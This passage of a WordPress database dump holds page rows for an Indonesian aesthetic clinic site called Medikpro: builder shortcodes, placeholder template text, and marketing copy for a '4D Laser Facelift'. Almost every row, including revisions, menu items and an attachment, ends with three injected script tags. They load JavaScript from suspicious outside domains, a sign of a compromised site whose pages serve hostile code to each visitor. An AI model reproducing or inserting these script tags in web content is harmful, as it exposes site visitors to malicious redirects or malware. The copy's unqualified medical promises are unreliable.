overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2017-12-14 04:22:19','2017-12-14 04:22:19','',5,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/5-revision-v1/',0,'revision','',0),(6245,1,'2017-12-14 04:24:40','2017-12-14 04:24:40','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"steps\" row_name=\"Sign Up Steps\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-5-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In From Left\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','publish','closed','closed','','facial-treatment','','','2017-12-14 04:26:48','2017-12-14 04:26:48','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6245',0,'page','',0),(6246,1,'2017-12-14 04:24:40','2017-12-14 04:24:40','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"steps\" row_name=\"Sign Up Steps\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-5-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][image_with_animation image_url=\"http://54cb3baa74d4d851e8b7-2e7f88565dceb0a8192c6645d1f8b1b4.r12.cf2.rackcdn.com/phone-normal.jpg\" alignment=\"\" animation=\"Fade In From Left\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][nectar_icon_list animate=\"true\" color=\"default\" icon_size=\"small\" icon_style=\"border\"][nectar_icon_list_item icon_type=\"numerical\" title=\"List Item\" id=\"1485457205085-00401-b2c7\" header=\"Sign Up For Free\" text=\"Create your free account in a matter of minutes with our patented awesome sign up process.\" tab_id=\"1513225478153-10\"] [/nectar_icon_list_item][nectar_icon_list_item icon_type=\"numerical\" title=\"List Item\" id=\"1485457205092-100401-b2c7\" header=\"Sell Goods Online\" text=\"Next start integrating it with your e-commerce platform of choice and start accepting payments.\" tab_id=\"1513225478181-5\"] [/nectar_icon_list_item][nectar_icon_list_item icon_type=\"numerical\" title=\"List Item\" id=\"1485457205111-20401-b2c7\" header=\"Love Your Life\" text=\"Sit back, relax and pop a cold one because your life just got a whole lot easier by using Salient.\" tab_id=\"1513225478210-10\"][/nectar_icon_list_item][/nectar_icon_list][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6245-revision-v1','','','2017-12-14 04:24:40','2017-12-14 04:24:40','',6245,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6245-revision-v1/',0,'revision','',0),(6247,1,'2017-12-14 04:26:17','2017-12-14 04:26:17','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','84-treatment-b','','inherit','open','closed','','84-treatment-b','','','2017-12-14 04:26:17','2017-12-14 04:26:17','',6245,'http://sandbox.futuremediatrix.com/medikpro/wp-content/uploads/2017/12/84-treatment-b.jpg',0,'attachment','image/jpeg',0),(6248,1,'2017-12-14 04:26:47','2017-12-14 04:26:47','<p>[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"steps\" row_name=\"Sign Up Steps\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-5-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In From Left\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.</p>\n<p>Unlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.</p>\n<ul>\n<li>SMOOTH</li>\n</ul>\n<p>This is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.</p>\n<ul>\n<li>FRAC3</li>\n</ul>\n<p>In this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.</p>\n<ul>\n<li>PIANO</li>\n</ul>\n<p>With a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.</p>\n<ul>\n<li>SupEficial</li>\n</ul>\n<p>The final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.</p>\n<p>This treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row]</p>\n<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6245-autosave-v1','','','2017-12-14 04:26:47','2017-12-14 04:26:47','',6245,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6245-autosave-v1/',0,'revision','',0),(6249,1,'2017-12-14 04:26:48','2017-12-14 04:26:48','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"steps\" row_name=\"Sign Up Steps\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-5-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][image_with_animation image_url=\"6247\" alignment=\"\" animation=\"Fade In From Left\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"padding-3-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"5/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-xs-12\"][vc_column_text]As a result of ageing, the skin loses its elasticity and firmness, also becomes flabby and dull and wrinkles begin to appear. But, with Our Non-Invasive and Non-Ablative Method: 4D Laser Facelift, We can restore You to more youthful appearance to the skin of the face and neck.\r\n\r\nUnlike any other laser treatments, 4D Laser Facelift are more dynamism and does not require any surgical procedures. The synergistic laser treatments treat both the exterior of the face as well as the interior oral cavity to produce results from both inside and out. With 4 unique laser modes : Smooth, Frac3, Piano, and SupErficial, 4D Laser Facelift can provides immediate and ongoing results.\r\n<ul>\r\n 	<li>SMOOTH</li>\r\n</ul>\r\nThis is the first step of the procedure and conducted on the inside of the oral cavity. This non-ablative laser will give the impacts on cheeks and lips and results in tightening, volumizing and restoring collagen starting from the inside out. This reduces the depth of the nasolabial and melomental folds, and help restore lip volume.\r\n<ul>\r\n 	<li>FRAC3</li>\r\n</ul>\r\nIn this second step, The Fractional beam is applied to the exterior of the face that targets deeper imperfections to restore a youthful texture and tone to the skin.\r\n<ul>\r\n 	<li>PIANO</li>\r\n</ul>\r\nWith a deep penetration of bulk tissue heating, this step will promote skin elasticity and tighten. This restores existing collagen and activates new collagen generation.\r\n<ul>\r\n 	<li>SupEficial</li>\r\n</ul>\r\nThe final step is used lastly to significantly improves skin smoothness, reduces skin surface irregularities and imperfections with an extremely controlled light peel. This step gives the skin a smoother pearl finish.\r\n\r\nThis treatment only performed once and does not require any recovery period. Medikpro wants to bring You into a new revolutionary method of laser rejuvenation and introduce You to a unique technology for the reconstruction of the facial skin. There is no pain and no downtime. You can continue Your daily activities right after treatment.[/vc_column_text][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/12\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6245-revision-v1','','','2017-12-14 04:26:48','2017-12-14 04:26:48','',6245,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/6245-revision-v1/',0,'revision','',0),(6251,1,'2017-12-27 04:47:12','2017-12-27 04:47:12','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6206\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Coba Dulu','','publish','closed','closed','','coba-dulu','','','2017-12-27 04:47:12','2017-12-27 04:47:12','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6251',0,'page','',0),(6252,1,'2017-12-27 04:47:12','2017-12-27 04:47:12','[vc_row type=\"in_container\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][image_with_animation image_url=\"6206\" alignment=\"\" animation=\"Fade In\" border_radius=\"none\" box_shadow=\"none\" max_width=\"100%\"][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Coba Dulu','','inherit','closed','closed','','6251-revision-v1','','','2017-12-27 04:47:12','2017-12-27 04:47:12','',6251,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6251-revision-v1/',0,'revision','',0),(6253,1,'2017-12-27 04:52:42','2017-12-27 04:52:42','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Tentang Medikpro','','publish','closed','closed','','tentan-medikpro','','','2017-12-27 04:52:49','2017-12-27 04:52:49','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6253',0,'page','',0),(6254,1,'2017-12-27 04:52:42','2017-12-27 04:52:42','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Tentan Medikpro','','inherit','closed','closed','','6253-revision-v1','','','2017-12-27 04:52:42','2017-12-27 04:52:42','',6253,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6253-revision-v1/',0,'revision','',0),(6255,1,'2017-12-27 04:52:49','2017-12-27 04:52:49','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Tentang Medikpro','','inherit','closed','closed','','6253-revision-v1','','','2017-12-27 04:52:49','2017-12-27 04:52:49','',6253,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6253-revision-v1/',0,'revision','',0),(6256,1,'2017-12-27 04:53:55','2017-12-27 04:53:55','Setiap orang pasti mempunyai 2 sampai 3 masalah kulit terutama pada bagian wajah. Setitik kerutan atau noda di wajah tentu akan merusak penampilan, sedangkan penampilan menjadi salah satu hal terpenting dalam kehidupan. Beragam cara dilakukan untuk mengembalikkan kecerahan kulit dan wajah seperti mengunjungi klinik kecantikan. Pasalnya, Memilih klinik kecantikan yang dapat memahami kebutuhan kulit masing-masing orang tidaklah mudah. Dan lagi, mayoritas para wanita khawatir setelah melakukan perawatan akan menyebabkan ketergantungan.\r\n\r\nDemi menjawab dan memberikan solusi untuk setiap permasalahan kulit dan wajah yang Anda alami, kini hadir Medikpro sebagai klinik Aesthetic yang peka akan kebutuhan setiap Individu.\r\n\r\nApa yang spesial dari Medikpro?\r\n<ul>\r\n 	<li>Medikpro mendukung setiap perawatan dengan teknologi canggih dan terkini</li>\r\n 	<li>Penerapan konsep dermatologi modern yang dijamin aman untuk kulit</li>\r\n 	<li>Mempunyai banyak solusi dan pilihan bagi setiap permasalahan kulit</li>\r\n 	<li>Memberikan perawatan yang efektif, berkualitas, terjamin dan selalu mengutamakan customer</li>\r\n 	<li>Memberikan hasil yang sesuai dengan ekspektasi customer kami</li>\r\n</ul>\r\nMedikpro bisa menjadi pilihan yang tepat bagi Anda dan setiap kebutuhan Anda, karena kepuasan Anda menjadi motivasi bagi kami untuk membawa perubahan bagi diri Anda menjadi lebih baik lagi.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Kenapa Medikpro??','','publish','closed','closed','','tentan-medikpro-2','','','2017-12-27 04:53:55','2017-12-27 04:53:55','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6256',0,'page','',0),(6257,1,'2017-12-27 04:53:55','2017-12-27 04:53:55','Setiap orang pasti mempunyai 2 sampai 3 masalah kulit terutama pada bagian wajah. Setitik kerutan atau noda di wajah tentu akan merusak penampilan, sedangkan penampilan menjadi salah satu hal terpenting dalam kehidupan. Beragam cara dilakukan untuk mengembalikkan kecerahan kulit dan wajah seperti mengunjungi klinik kecantikan. Pasalnya, Memilih klinik kecantikan yang dapat memahami kebutuhan kulit masing-masing orang tidaklah mudah. Dan lagi, mayoritas para wanita khawatir setelah melakukan perawatan akan menyebabkan ketergantungan.\r\n\r\nDemi menjawab dan memberikan solusi untuk setiap permasalahan kulit dan wajah yang Anda alami, kini hadir Medikpro sebagai klinik Aesthetic yang peka akan kebutuhan setiap Individu.\r\n\r\nApa yang spesial dari Medikpro?\r\n<ul>\r\n 	<li>Medikpro mendukung setiap perawatan dengan teknologi canggih dan terkini</li>\r\n 	<li>Penerapan konsep dermatologi modern yang dijamin aman untuk kulit</li>\r\n 	<li>Mempunyai banyak solusi dan pilihan bagi setiap permasalahan kulit</li>\r\n 	<li>Memberikan perawatan yang efektif, berkualitas, terjamin dan selalu mengutamakan customer</li>\r\n 	<li>Memberikan hasil yang sesuai dengan ekspektasi customer kami</li>\r\n</ul>\r\nMedikpro bisa menjadi pilihan yang tepat bagi Anda dan setiap kebutuhan Anda, karena kepuasan Anda menjadi motivasi bagi kami untuk membawa perubahan bagi diri Anda menjadi lebih baik lagi.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Kenapa Medikpro??','','inherit','closed','closed','','6256-revision-v1','','','2017-12-27 04:53:55','2017-12-27 04:53:55','',6256,'http://sandbox.futuremediatrix.com/medikpro/2017/12/27/6256-revision-v1/',0,'revision','',0),(6258,1,'2017-12-27 04:54:40','2017-12-27 04:54:40',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6258','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6258',3,'nav_menu_item','',0),(6259,1,'2017-12-27 04:54:40','2017-12-27 04:54:40',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6259','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6259',4,'nav_menu_item','',0),(6260,1,'2017-12-27 04:56:06','2017-12-27 04:56:06','<strong>Visi</strong>\r\n\r\nMenjadi klinik aesthetic terkemuka di Indonesia untuk memberikan pengalaman 